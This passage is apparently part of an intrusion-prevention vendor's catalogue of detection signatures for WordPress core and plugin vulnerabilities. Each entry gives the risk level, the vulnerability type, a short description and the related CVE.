https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25080

Wordpress-Core-Avatar-Block-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in WordPress Project WordPress

Risk:

Moderate

First detected in:

sgpkg-ips-1730-5242

Last changed:

sgpkg-ips-1730-5242

Platform:

Generic

Software:

WordPress

Type:

Input Validation

Description:

Improper validation of avatar blocks causes a stored cross-site scripting vulnerability in WordPress. A successful exploitation allows an attacker to execute arbitrary scripts in a user's browser.

Situation:

HTTP_CRL-Wordpress-Core-Avatar-Block-Stored-Cross-Site-Scripting

References:

CVE-2024-4439
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-4439

Wordpress-Core-External-Entity-Injection

About this vulnerability:

A vulnerability in WordPress Project WordPress

Risk:

Moderate

First detected in:

sgpkg-ips-1345-5242

Last changed:

sgpkg-ips-1345-5242

Platform:

Generic

Software:

WordPress

Type:

Input Validation

Description:

Improper validation of XML data in RIFF WAV file metadata causes an entity injection vulnerability in Wordpress Core. A successful exploit allows an attacker to access files on the target system.

Situation:

File-RIFF_Wordpress-Core-External-Entity-Injection

References:

CVE-2021-29447
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-29447

Wordpress-Core-Post-Slug-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in WordPress Project WordPress

Risk:

Moderate

First detected in:

sgpkg-ips-1430-5242

Last changed:

sgpkg-ips-1430-5242

Platform:

Generic

Software:

WordPress

Type:

Input Validation

Description:

Improper validation of received post slugs causes a cross-site scripting vulnerability in WordPress. A successful exploit allows an attacker to execute arbitrary scripts in a user's browser.

Situation:

HTTP_CRL-Wordpress-Core-Post-Slug-Stored-Cross-Site-Scripting

References:

CVE-2022-21662
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21662

Wordpress-Database-Backup-RCE

About this vulnerability:	A vulnerability in WordPress
Risk:	High
First detected in:	sgpkg-ips-1196-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	WordPress
Type:	Input Validation
Description:	A vulnerability in WordPress, versions before 5.2 which allows remote attackers to execute arbitrary commands through the wp_db_exclude_table parameter, due to unsufficient validation of user input.
Situation:	HTTP_CRL-Wordpress-Database-Backup-RCE

Wordpress-Download-Manager-Plugin-Attach-File-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in WordPress Project Download Manager Plugin for WordPress

Risk:

Moderate

First detected in:

sgpkg-ips-1419-5242

Last changed:

sgpkg-ips-1419-5242

Platform:

Generic

Software:

WordPress

Type:

Input Validation

Description:

Insufficient sanitization of user-supplied data in the Attach File section of the Download manager plugin for Wordpress causes a cross-site scripting vulnerability. A successful exploit allows an attacker to execute arbitrary scripts in a user's browser.

Situation:

HTTP_CRL-Wordpress-Download-Manager-Plugin-Attach-File-Stored-Cross-Site-Scripting

References:

CVE-2021-24773
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24773

Wordpress-Download-Manager-Plugin-Package-Settings-Stored-XSS

About this vulnerability:

A vulnerability in WordPress Project Download Manager Plugin for WordPress

Risk:

Moderate

First detected in:

sgpkg-ips-1407-5242

Last changed:

sgpkg-ips-1407-5242

Platform:

Generic

Software:

WordPress

Type:

Input Validation

Description:

Insufficient sanitization of user-supplied data in Package Settings causes a cross-site scripting vulnerability in Download Manager Plugin for WordPress.

Situation:

File-Text_Wordpress-Download-Manager-Plugin-Package-Settings-Stored-XSS

References:

CVE-2021-24773
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24773

Wordpress-Download-Manager-Unauthenticated-Remote-File-Upload

About this vulnerability:	A vulnerability in Wordpress Download Manager
Risk:	High
First detected in:	sgpkg-ips-1326-5242
Last changed:	sgpkg-ips-1326-5242
Platform:	Generic
Software:	Wordpress Download Manager
Type:	Insecure Configuration
Description:	There exists a overflow vulnerability Wordpress Download Manager, versions before 2.7.5, which allows unauthenticated users to upload arbitrary files which could lead to remote code execution.
Situation:	HTTP_CS_Wordpress-Download-Manager-Unauthenticated-Remote-File-Upload

Wordpress-Download-Monitor-Plugin-Post_Title-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in WordPress Project Download Monitor Plugin for WordPress

Risk:

Moderate

First detected in:

sgpkg-ips-1440-5242

Last changed:

sgpkg-ips-1440-5242

Platform:

Generic

Software:

WordPress

Type:

Input Validation

Description:

Insufficient sanitization of user-supplied data in the post_title parameter of certain requests causes a stored cross-site scripting vulnerability in the Download Monitor Plugin for WordPress. A successful exploitation can allow an attacker to execute arbitrary scripts in a user's browser.

Situation:

HTTP_CRL-Wordpress-Download-Monitor-Plugin-Post_Title-Stored-Cross-Site-Scripting

References:

CVE-2021-23174
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23174

Wordpress-Drag-And-Drop-Multi-File-Uploader-RCE

About this vulnerability:

An attempt to exploit a vulnerability in Wordpress Drag And Drop Plugin

Risk:

High

First detected in:

sgpkg-ips-1340-5242

Last changed:

sgpkg-ips-1340-5242

Platform:

Generic

Software:

Wordpress Drag And Drop Plugin

Type:

Input Validation

Description:

There exists a vulberability in Wordpress Drag And Drop Plugin, versions before 1.3.4, which allows remote attackers to execute arbitrary PHP code by uploading a PHP file with a % character appended to the .php file extension.

Situation:

HTTP_CS-Wordpress-Drag-And-Drop-Multi-File-Uploader-RCE

References:

CVE-2020-12800
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12800

Wordpress-DukaPress-Plugin-Directory-Traversal

About this vulnerability:

A Wordpress DukaPress Plugin Directory Traversal vulnerability.

Risk:

Moderate

First detected in:

sgpkg-ips-769-5211

Last changed:

sgpkg-ips-1638-5242

Platform:

Generic

Software:

WordPress DukaPress

Type:

Directory Traversal

Description:

A vulnerability in the WordPress DukaPress Plugin, versions before 2.5.4, which allows remote attackers to read arbitrary files via a directory traversal in the src parameter to lib/dp_image.php.

References:

CVE-2014-8799
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8799

OSVDB-115130
http://www.osvdb.org/115130

Wordpress-EasyCart-Plugin-Privilege-Escalation

About this vulnerability:

Wordpress EasyCart Plugin Privilege Escalation vulnerability.

Risk:

High

First detected in:

sgpkg-ips-685-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

WordPress EasyCart

Type:

Input Validation

Description:

A validation vulnerability exists in WordPress EasyCart 1.1.30 to 3.0.20 that allows remote attackers of any user level to set any system option via a lac of validation through the ec_ajax_update_option and ec_ajax_clear_all_taxrates functions located in /inc/admin/admin_ajax_functions.php.

Situation:

HTTP_CRL-Wordpress-EasyCart-Plugin-Privilege-Escalation

References:

CVE-2015-2673
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2673

Wordpress-Email-Subscribers-And-Newsletters-Hash-SQLi-Scanner

About this vulnerability:

An attempt to scan WordPress Email Subscribers and Newsletters plugin

Risk:

High

First detected in:

sgpkg-ips-1338-5242

Last changed:

sgpkg-ips-1338-5242

Platform:

Generic

Software:

WordPress Subscribers And Newsletters Plugin

Type:

SQL Injection

Description:

There exists a vulberability in WordPress Subscribers And Newsletters Plugin, versions before 4.3.1, which allows remote attackers to scan by unathenticated SQL injection via the hash parameter.

Situation:

HTTP_CS-Wordpress-Email-Subscribers-And-Newsletters-Hash-SQLi-Scanner

References:

CVE-2019-20361
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20361

Wordpress-Email-Template-Designer-Plugin-Authentication-Bypass

About this vulnerability:

A vulnerability in WordPress Project WordPress Email Template Designer - WP HTML Mail Plugin

Risk:

Moderate

First detected in:

sgpkg-ips-1444-5242

Last changed:

sgpkg-ips-1444-5242

Platform:

Generic

Software:

WordPress

Type:

Malfunction

Description:

Lack of proper authentication on REST-API endpoints created by the Template Designer plugin causes an authentication bypass vulnerability in Wordpress. A successful exploit allows an attacker to execute arbitrary scripts in an admin user's browser.

Situation:

HTTP_CS-Wordpress-Email-Template-Designer-Plugin-Authentication-Bypass

References:

CVE-2022-0218
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0218

Wordpress-Events-Made-Easy-Plugin-Lang-SQL-Injection

About this vulnerability:

A vulnerability in Wordpress Project Events Made Easy

Risk:

Moderate

First detected in:

sgpkg-ips-1486-5242

Last changed:

sgpkg-ips-1486-5242

Platform:

Generic

Software:

WordPress

Type:

Input Validation

Description:

Improper input validation for the lang parameter causes an SQL injection vulnerability in the Events Made Easy plugin for Wordpress. A successful exploit allows an attacker to execute arbitrary SQL in the database on the target server.

Situation:

HTTP_CRL-Wordpress-Events-Made-Easy-Plugin-Lang-SQL-Injection

References:

CVE-2022-1905
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1905

Wordpress-File-Manager-Advanced-Shortcode-RCE

About this vulnerability:

An attempt to exploit a vulnerability in WordPress File Manager Advanced Shortcode Plugin detected

Risk:

High

First detected in:

sgpkg-ips-1729-5242

Last changed:

sgpkg-ips-1729-5242

Platform:

Generic

Software:

WordPress File Manager Advanced Shortcode Plugin

Type:

Input Validation

Description:

A vulnerability in WordPress File Manager Advanced Shortcode Plugin, versions 2.3.2 and before, which allows remote attackers to execute arbitrary code due to the insufficient validation of allowed MIME types when uploading files.

Situation:

HTTP_CS-Wordpress-File-Manager-Advanced-Shortcode-RCE

References:

CVE-2023-2068
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2068

Wordpress-File-Manager-Plugin-RCE-CVE-2020-25213

About this vulnerability:

A vulnerability in WordPress File Manager Plugin

Risk:

High

First detected in:

sgpkg-ips-1276-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

WordPress File Manager Plugin

Type:

Insecure Configuration

Description:

There exists a vulnerability in WordPress File Manager plugin, versions prior to 6.9. Successful exploitation allows remote attackers to upload files and execute arbitrary PHP code.

Situation:

HTTP_CRL-Wordpress-File-Manager-Plugin-RCE-CVE-2020-25213

References:

CVE-2020-25213
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25213

Wordpress-Forminator-Plugin-Reflected-Cross-Site-Scripting

About this vulnerability:

A vulnerability in WordPress Forminator Plugin

Risk:

High

First detected in:

sgpkg-ips-1632-5242

Last changed:

sgpkg-ips-1632-5242

Platform:

Generic

Software:

WordPress

Type:

Input Validation

Description:

A reflected cross-site scripting vulnerability has been reported for the WordPress plugin Forminator. This vulnerability is due to improper input validation of the pre-populated query parameters. A remote, unauthenticated attacker could exploit this vulnerability by enticing a victim to click a malicious link. Successfully exploiting this vulnerability could result in arbitrary code execution in the context of the victim's browser.

Situation:

File-Text_Wordpress-Forminator-Plugin-Reflected-Cross-Site-Scripting

References:

CVE-2023-3134
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3134

Wordpress-Forminator-Plugin-SQL-Injection

About this vulnerability:

A vulnerability in WordPress Project Forminator Plugin

Risk:

Moderate

First detected in:

sgpkg-ips-1733-5242

Last changed:

sgpkg-ips-1733-5242

Platform:

Generic

Software:

WordPress Project Forminator Plugin

Type:

Input Validation

Description:

Insufficient validation of the user input in the request parameters causes an SQL injection vulnerability in the WordPress Forminator Plugin. A successful exploitation allows an attacker to execute arbitrary SQL on the target system.

Situation:

HTTP_CRL-Wordpress-Forminator-Plugin-SQL-Injection

References:

CVE-2024-31077
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-31077

Wordpress-GDPR-Cookie-Consent-Plugin-Stored-Cross-Site-Scripting

About this vulnerability:	A vulnerability in Webtoffee GDPR Cookie Consent Plugin
Risk:	Moderate
First detected in:	sgpkg-ips-1226-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	WordPress
Type:	Input Validation
Description:	There exists a stored cross-site scripting vulnerability in the GDPR Cookie Consent Plugin for WordPress. Successful exploitation could lead in arbitrary script execution.
Situation:	HTTP_CRL-Wordpress-GDPR-Cookie-Consent-Plugin-Stored-Cross-Site-Scripting

Wordpress-Google-Maps-Plugin-SQL-Injection

About this vulnerability:

A vulnerability in WordPress Google Maps Plugin

Risk:

High

First detected in:

sgpkg-ips-1198-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

WordPress Google Maps Plugin

Type:

Input Validation

Description:

A vulnerability in the WordPress Google Maps Plugin, versions 7.11.00 through 7.11.17, which allows remote attackers to perform SQL injections via the REST API in the fields parameter.

Situation:

HTTP_CSU-Wordpress-Google-Maps-Plugin-SQL-Injection

References:

CVE-2019-10692
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10692

Wordpress-Google-Tag-Manager-Plugin-Reflected-Cross-Site-Scripting

About this vulnerability:

A vulnerability in the Wordpress Google Tag Manager Plugin.

Risk:

High

First detected in:

sgpkg-ips-1481-5242

Last changed:

sgpkg-ips-1481-5242

Platform:

Generic

Software:

Wordpress Google Tag Manager Plugin

Type:

Cross-site Scripting

Description:

A vulnerability in the WordPress Google Tag Manager for WordPress Plugin, versions prior to 1.15.1, which allows remote attackers to execute arbitrary scripts in the target users browser, by enticing the target user to click on a crafted link, due to insufficient validation of site search requests.

Situation:

HTTP_CSU-Wordpress-Google-Tag-Manager-Plugin-Reflected-Cross-Site-Scripting

References:

CVE-2022-1707
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1707

Wordpress-Hash-Form-Plugin-RCE

About this vulnerability:

An attempt to exploit a vulnerability in the WordPress Hash Form plugin detected

Risk:

High

First detected in:

sgpkg-ips-1742-5242

Last changed:

sgpkg-ips-1742-5242

Platform:

Linux; Windows

Software:

WordPress Hash Form Plugin

Type:

Input Validation

Description:

A vulnerability in the WordPress Hash Form plugin which allows remote attackers to execute arbitrary code by uploading malicious files, due to missing file type validation in the file_upload_action function.

Situation:

HTTP_CRL-Wordpress-Hash-Form-Plugin-RCE

References:

CVE-2024-5084
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-5084

Wordpress-Holding-Pattern-Theme-Arbitrary-File-Upload

About this vulnerability:

Wordpress Holding Pattern Theme Arbitrary File Upload vulnerability.

Risk:

High

First detected in:

sgpkg-ips-686-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

WordPress Holding Pattern

Type:

Insecure Configuration

Description:

An unrestricted file upload vulnerability exists in Wordpress Holding Pattern Theme 0.6 and earlier, do to the lack of file type verification, which allows remote attackers to execute arbitrary PHP code by uploading a file with a PHP extension and then accessing it via a request to the file name.

Situation:

HTTP_CS-Wordpress-Holding-Pattern-Theme-Arbitrary-File-Upload

References:

CVE-2015-1172
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1172

BID-72546
http://www.securityfocus.com/bid/72546

Wordpress-Husky-Products-Filter-Plugin-Local-File-Inclusion-CVE-2025-1661

About this vulnerability:

A vulnerability in WordPress Husky Products Filter plugin

Risk:

High

First detected in:

sgpkg-ips-1870-5242

Last changed:

sgpkg-ips-1870-5242

Platform:

Generic

Software:

WordPress Project Husky Products Filter Plugin

Type:

Input Validation

Description:

A local file inclusion vulnerability has been reported in the Husky Products Filter plugin for WordPress. This vulnerability is due to improper input validation of the template parameter. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successful exploitation could result in sensitive information disclosure, and in the worst case execution of arbitrary code.

Situation:

HTTP_CRL-Wordpress-Husky-Products-Filter-Plugin-Local-File-Inclusion-CVE-2025-1661

References:

CVE-2025-1661
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-1661

Wordpress-Husky-Products-Filter-Plugin-Woof_Author-SQL-Injection

About this vulnerability:

A vulnerability in WordPress Project Husky Products Filter Plugin

Risk:

Moderate

First detected in:

sgpkg-ips-1768-5242

Last changed:

sgpkg-ips-1768-5242

Platform:

Generic

Software:

WordPress Project Husky Products Filter Plugin

Type:

Input Validation

Description:

Improper input validation of the woof_author parameter causes an SQL injection vulnerability in Husky Products Filter Plugin for WordPress. A successful exploitation allows an attacker to execute arbitrary SQL on the target database.

Situation:

HTTP_CRL-Wordpress-Husky-Products-Filter-Plugin-Woof_Author-SQL-Injection

References:

CVE-2024-6457
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-6457

Wordpress-InfiniteWP-Client-Authentication-Bypass

About this vulnerability:	A vulnerability in WordPress InfiniteWP
Risk:	High
First detected in:	sgpkg-ips-1224-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	WordPress InfiniteWP
Type:	Insecure Configuration
Description:	There exists a vulnerability in the WordPress InfiniteWP Client plugin, WordPress versions 4.9 and greater, which allows remote attackers to bypass authentication and execute arbitrary PHP code.
Situation:	HTTP_CRL-Wordpress-InfiniteWP-Client-Authentication-Bypass

Wordpress-Infusionsoft-Gravity-Forms-PHP-Upload

About this vulnerability:

A Wordpress Infusionsoft Gravity Forms PHP Upload vulnerability.

Risk:

High

First detected in:

sgpkg-ips-696-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Wordpress Infusionsoft Gravity Forms

Type:

Input Validation

Description:

A vulnerability in Wordpress Infusionsoft Gravity Forms plugin, versions 1.5.3 to 1.5.10, that allows remote attackers to upload and execute arbitrary PHP code due to insufficient user input sanitization and the lack of proper access restriction.

Situation:

HTTP_CRL-Wordpress-Infusionsoft-Gravity-Forms-PHP-Upload

References:

CVE-2014-6446
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6446

OSVDB-112171
http://www.osvdb.org/112171

Wordpress-Kadence-Blocks-Plugin-Advanced-Form-Unrestricted-File-Upload

About this vulnerability:	A vulnerability in WordPress Kadence Blocks Plugin
Risk:	High
First detected in:	sgpkg-ips-1629-5242
Last changed:	sgpkg-ips-1629-5242
Platform:	Generic
Software:	WordPress
Type:	Input Validation
Description:	An unrestricted file upload vulnerability has been reported in the WordPress Kadence Blocks plugin. The vulnerability is due to a design weakness when handling advanced forms file uploads. A remote, unauthenticated attacker could exploit this vulnerability by uploading a crafted file via an advanced form. Successfully exploiting this vulnerability could result in remote code execution under the security context of the PHP interpreter.
Situation:	HTTP_CS-Wordpress-Kadence-Blocks-Plugin-Advanced-Form-Unrestricted-File-Upload

Wordpress-Ketchup-Restaurant-Reservations-Plugin-Data-Cross-Site-Scripting

About this vulnerability:

A vulnerability in WordPress Project Ketchup Restaurant Reservations Plugin

Risk:

Moderate

First detected in:

sgpkg-ips-1518-5242

Last changed:

sgpkg-ips-1518-5242

Platform:

Generic

Software:

WordPress

Type:

Input Validation

Description:

Insufficient sanitation of the user-supplied 'data' parameter causes a cross-site scripting vulnerability in the WordPress Project Ketchup Restaurant Reservations Plugin. A successful exploit allows an attacker to execute arbitrary scripts on a user's browser.

Situation:

HTTP_CRL-Wordpress-Ketchup-Restaurant-Reservations-Plugin-Data-XSS

References:

CVE-2022-2753
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2753

Wordpress-Ketchup-Restaurant-Reservations-Plugin-SQL-Injection

About this vulnerability:

A vulnerability in WordPress Project Ketchup Restaurant Reservations Plugin

Risk:

Moderate

First detected in:

sgpkg-ips-1511-5242

Last changed:

sgpkg-ips-1511-5242

Platform:

Generic

Software:

WordPress

Type:

Input Validation

Description:

Insufficient sanitation of user-supplied data causes an SQL injection vulnerability in the Ketchup Restaurant Reservations Plugin of WordPress. A successful exploit allows an attacker to execute arbitrary SQL on the target system.

Situation:

HTTP_CRL-Wordpress-Ketchup-Restaurant-Reservations-Plugin-SQL-Injection

References:

CVE-2022-2754
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2754

Wordpress-KingComposer-Plugin-Reflected-Cross-Site-Scripting

About this vulnerability:

A vulnerability in WordPress KingComposer plugin

Risk:

Moderate

First detected in:

sgpkg-ips-1365-5242

Last changed:

sgpkg-ips-1365-5242

Platform:

Generic

Software:

WordPress

Type:

Input Validation

Description:

A reflected cross-site scripting vulnerability has been reported in the WordPress KingComposer plugin versions prior to 2.9.5. Successful exploitation could result in the execution of script code in security context of the target user's browser.

Situation:

HTTP_CRL-Wordpress-KingComposer-Plugin-Reflected-Cross-Site-Scripting

References:

CVE-2020-15299
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15299

Wordpress-Layerslider-Plugin-SQL-Injection-CVE-2024-2879

About this vulnerability:

A vulnerability in WordPress LayerSlider plugin

Risk:

High

First detected in:

sgpkg-ips-1728-5242

Last changed:

sgpkg-ips-1728-5242

Platform:

Generic

Software:

WordPress

Type:

Input Validation

Description:

An SQL injection vulnerability has been reported in WordPress LayerSlider plugin versions 7.9.11-7.10.0.

Situation:

HTTP_CRL-Wordpress-Layerslider-Plugin-SQL-Injection-CVE-2024-2879

References:

CVE-2024-2879
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-2879

Wordpress-Learnpress-Plugin-Handle_params_For_Query_courses-SQL-Injection

About this vulnerability:

A vulnerability in WordPress Project LearnPress Plugin

Risk:

High

First detected in:

sgpkg-ips-1681-5242

Last changed:

sgpkg-ips-1681-5242

Platform:

Generic

Software:

WordPress Project LearnPress Plugin

Type:

Input Validation

Description:

An SQL injection vulnerability has been reported in LearnPress Plugin for WordPress. The vulnerability is due to insufficient user input validation in the handle_params_for_query_courses() function. A remote, unauthenticated attacker can exploit this vulnerability by sending a specially crafted request to the target server. Successful exploitation could result in arbitrary SQL command execution against the target server's database.

Situation:

HTTP_CS-Wordpress-Learnpress-Plugin-Handle_params_For_Query_courses-SQL-Injection
HTTP_CRL-Wordpress-Learnpress-Plugin-Handle_params_For_Query_courses-SQL-Injection

References:

CVE-2023-6567
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6567

Wordpress-Learnpress-Plugin-Profile-Settings-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in WordPress Project LearnPress Plugin

Risk:

Moderate

First detected in:

sgpkg-ips-1404-5242

Last changed:

sgpkg-ips-1404-5242

Platform:

Generic

Software:

WordPress

Type:

Input Validation

Description:

Insufficient sanitization of user-supplied data in the Profile Settings page causes a cross-site scripting vulnerability in the Wordpress Learnpress Plugin.

Situation:

HTTP_CS-Wordpress-Learnpress-Plugin-Profile-Settings-Stored-Cross-Site-Scripting

References:

CVE-2021-39348
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-39348

Wordpress-Learnpress-Plugin-SQL-Injection-CVE-2024-8522

About this vulnerability:

A vulnerability in WordPress LearnPress plugin

Risk:

High

First detected in:

sgpkg-ips-1782-5242

Last changed:

sgpkg-ips-1782-5242

Platform:

Generic

Software:

WordPress Project LearnPress Plugin

Type:

Input Validation

Description:

A pre-authentication SQL injection vulnerability has been reported in LearnPress plugin for WordPress. The vulnerability is due to insufficient user input validation of c_only_fields. Successful exploitation could result in arbitrary SQL command execution against the target server's database.

Situation:

HTTP_CRL-Wordpress-Learnpress-Plugin-SQL-Injection-CVE-2024-8522

References:

CVE-2024-8522
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-8522

Wordpress-Limit-Login-Attempts-Plugin-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in WordPress Limit Login Attempts Plugin

Risk:

High

First detected in:

sgpkg-ips-1605-5242

Last changed:

sgpkg-ips-1605-5242

Platform:

Generic

Software:

WordPress

Type:

Input Validation

Description:

A stored cross-site scripting vulnerability has been discovered in WordPress Limit Login Attempts Plugin. The vulnerability is due to improper input validation. A remote, unauthenticated attacker could exploit this vulnerability by sending crafted requests to the target system. Successful exploitation could result in stored cross-site scripting. The vendor has released a patch to address this vulnerability in plugin version 1.7.2.

Situation:

HTTP_CSH-Wordpress-Limit-Login-Attempts-Plugin-Stored-Cross-Site-Scripting

References:

CVE-2023-1861
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1861

Wordpress-LiteSpeed-Cache-Plugin-Cross-Site-Scripting-CVE-2023-40000

About this vulnerability:

A vulnerability in WordPress LiteSpeed Cache plugin

Risk:

Moderate

First detected in:

sgpkg-ips-1728-5242

Last changed:

sgpkg-ips-1728-5242

Platform:

Generic

Software:

WordPress

Type:

Input Validation

Description:

A stored cross-site scripting vulnerability has been reported in WordPress LiteSpeed Cache plugin versions through 5.7.

Situation:

HTTP_CRL-Wordpress-LiteSpeed-Cache-Plugin-Cross-Site-Scripting-CVE-2023-40000

References:

CVE-2023-40000
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-40000

Wordpress-Long-Password-DoS

About this vulnerability:

A vulnerability in WordPress.

Risk:

High

First detected in:

sgpkg-ips-1422-5242

Last changed:

sgpkg-ips-1422-5242

Platform:

Generic

Software:

WordPress

Type:

Malfunction

Description:

A vulnerability in WordPress, versions before 3.7.5, 3.8.x before 3.8.5, 3.9.x before 3.9.3, and 4.x before 4.0.1, allows remote attackers to cause a denial of service condition by sending a long password, due to the improper handling during hashing.

Situation:

HTTP_CRL-Wordpress-Long-Password-DoS

References:

CVE-2014-9034
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9034

Wordpress-Mailchimp-Subscribe-Forms-Php-Code-Execution

About this vulnerability:

A vulnerability in Novell ZENworks Configuration Management

Risk:

High

First detected in:

sgpkg-ips-654-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

WordPress Project MailChimp Subscribe Forms Plugin

Type:

Input Validation

Description:

A PHP code execution vulnerability has been reported in Wordpress plugin MailChimp Subscribe Forms. The vulnerability is due to insufficient validation of user-controlled email address when handling subscribe requests. An unauthenticated remote attacker can exploit this vulnerability by sending an HTTP request with a crafted "email" field to the target server. Successful attack could result in PHP code injection and execution on the target WordPress server.

Situation:

HTTP_CRL-Wordpress-Mailchimp-Subscribe-Forms-Php-Code-Execution

References:

OSVDB-121081
http://www.osvdb.org/121081

Wordpress-MasterStudy-Admin-Account-Creation

About this vulnerability:

A vulnerability in the WordPress MasterStudy Plugin.

Risk:

High

First detected in:

sgpkg-ips-1446-5242

Last changed:

sgpkg-ips-1446-5242

Platform:

Generic

Software:

WordPress MasterStudy Plugin

Type:

Input Validation

Description:

A vulnerability in the WordPress MasterStudy Plugin, versions before 2.7.6, which allows remote attackers to create administrator accounts for WorPress itself, due to insufficient validation of certain parameters.

Situation:

HTTP_CRL-Wordpress-MasterStudy-Admin-Account-Creation

References:

CVE-2022-0441
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0441

Wordpress-Metform-Elementor-Plugin-Form-data.php-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in WordPress Project Metform Elementor Contact Form Builder Plugin

Risk:

High

First detected in:

sgpkg-ips-1573-5242

Last changed:

sgpkg-ips-1573-5242

Platform:

Generic

Software:

WordPress

Type:

Input Validation

Description:

A stored cross-site scripting vulnerability has been reported for the WordPress Metform Elementor Contact Form Builder plugin. This vulnerability is due to insufficient validation of user supplied data parameter when handling form submission requests. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successful exploitation could result in the execution of script code in the security context of a target user's browser.

Situation:

HTTP_CRL-Wordpress-Metform-Elementor-Plugin-Form-data.php-Stored-Cross-Site-Scripting

References:

CVE-2023-0084
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0084

Wordpress-Modern-Events-Calendar-Lite-Plugin-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in WordPress Project Modern Events Calendar Lite

Risk:

Moderate

First detected in:

sgpkg-ips-1457-5242

Last changed:

sgpkg-ips-1457-5242

Platform:

Generic

Software:

Wordpress Modern Events Calendar Plugin

Type:

Input Validation

Description:

A stored cross-site scripting vulnerability has been reported for the WordPress plugin Modern Events Calendar Lite. This vulnerability is due to improper input validation for multiple parameters in the Hourly Schedule section. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in arbitrary script execution in the context of the victim's browser.

Situation:

HTTP_CRL-Wordpress-Modern-Events-Calendar-Lite-Plugin-Stored-Cross-Site-Scripting

References:

CVE-2022-0364
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0364

Wordpress-Modern-Events-Calendar-SQLi-Scanner

About this vulnerability:

A vulnerability in the WordPress Modern Events Calendar plugin.

Risk:

High

First detected in:

sgpkg-ips-1444-5242

Last changed:

sgpkg-ips-1444-5242

Platform:

Generic

Software:

Wordpress Modern Events Calendar Plugin

Type:

SQL Injection

Description:

A vulnerability in the WordPress Modern Events Calendar plugin, versions before 6.1.5, which allows remote attackers to execute SQL commands via the time parameter, due to insufficient validation.

Situation:

HTTP_CSU-Wordpress-Modern-Events-Calendar-SQLi-Scanner

References:

CVE-2021-24946
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24946

Wordpress-Multiple-File-Load-DoS-CVE-2018-6389

About this vulnerability:

A vulnerability in Wordpress

Risk:

Moderate

First detected in:

sgpkg-ips-1560-5242

Last changed:

sgpkg-ips-1560-5242

Platform:

Generic

Software:

WordPress

Type:

Input Validation

Description:

A request to load multiple registered js files can be used to cause a denial of service condition in Wordpress.

Situation:

HTTP_CRL-Wordpress-Multiple-File-Load-DoS-CVE-2018-6389

References:

CVE-2018-6389
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6389

Wordpress-My-Calendar-Plugin-My_calendar_rest_route-SQL-Injection

About this vulnerability:

A vulnerability in WordPress My Calendar plugin

Risk:

High

First detected in:

sgpkg-ips-1673-5242

Last changed:

sgpkg-ips-1673-5242

Platform:

Generic

Software:

WordPress

Type:

Input Validation

Description:

An SQL injection vulnerability has been reported in the WordPress plugin My Calendar. This vulnerability is due to improper input validation in the my_calendar_rest_route function. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in SQL injection.

Situation:

